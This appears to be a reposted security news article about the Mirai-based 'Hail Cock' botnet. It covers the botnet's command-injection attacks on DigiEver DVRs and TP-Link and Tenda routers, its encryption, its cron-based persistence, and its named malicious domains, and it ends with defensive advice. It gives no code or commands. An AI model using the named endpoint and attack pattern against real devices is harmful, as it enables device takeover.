The Hail Cock Botnet, a new Mirai-based botnet, has been targeting vulnerable IoT devices, such as DigiEver DVRs and TP-Link devices that have CVE-2023-1389 vulnerabilities. This botnet, which has been active since September 2024, is using a variant of Mirai malware with enhanced encryption to carry out its attacks.

In a recent surge of attacks, the botnet has been focusing on exploiting the URI /cgi-bin/cgi_main.cgi and taking advantage of an RCE vulnerability in DigiEver DS-2105 Pro devices. Even though this vulnerability does not have a CVE assigned to it, it was previously disclosed by Ta-Lun Yen of TXOne Research.

The researcher who discovered these vulnerabilities found that the DigiEver DVRs exposed online had the /cgi-bin/cgi_main.cgi endpoint in their firmware. By exploiting this endpoint, the attackers were able to execute arbitrary code on the vulnerable devices, potentially giving them remote control or enabling data theft.

The botnet has been targeting devices with known vulnerabilities, exploiting command injection flaws in DigiEver routers, TP-Link routers, and Tenda HG6 routers. The attackers inject commands to download malicious scripts from remote servers, which then fetch and execute Mirai-based malware. They are also targeting other vulnerabilities, such as CVE-2018-17532, using similar tactics.

The malware samples analyzed by security experts revealed a sophisticated multi-layer encryption scheme, combining XOR and ChaCha20 algorithms. This level of encryption demonstrates an evolution in the tactics used by botnet operators to evade detection and hinder security analysis efforts.

Akamai analyzed the malware samples in a sandbox environment and observed persistence mechanisms employed by the malware. It creates a cron job to download a shell script named “wget.sh” from a server called “hailcocks.ru” and executes it, likely establishing communication with the botnet’s C2 server at “kingstonwikkerink.dyn.”

The malware also leaves distinctive marks in the console, with older versions announcing its affiliation to the “hail cock botnet” while newer versions display a seemingly benign message, “I just wanna look after my cats, man.”

As seen in the case of the Hail Cock botnet, cybercriminals are taking advantage of obsolete hardware and firmware to create botnets. Devices like the outdated DigiEver DS-2105 Pro, which no longer receive security patches from their manufacturers, are ideal targets for attackers. To reduce the risk of falling victim to such attacks, users are advised to upgrade vulnerable devices to newer, more secure models, especially if the manufacturers are no longer providing updates.

In conclusion, the emergence of the Hail Cock Botnet highlights the ongoing threat posed by cybercriminals targeting IoT devices with known vulnerabilities. Users must remain vigilant and take proactive steps to protect their devices from such attacks.

Source link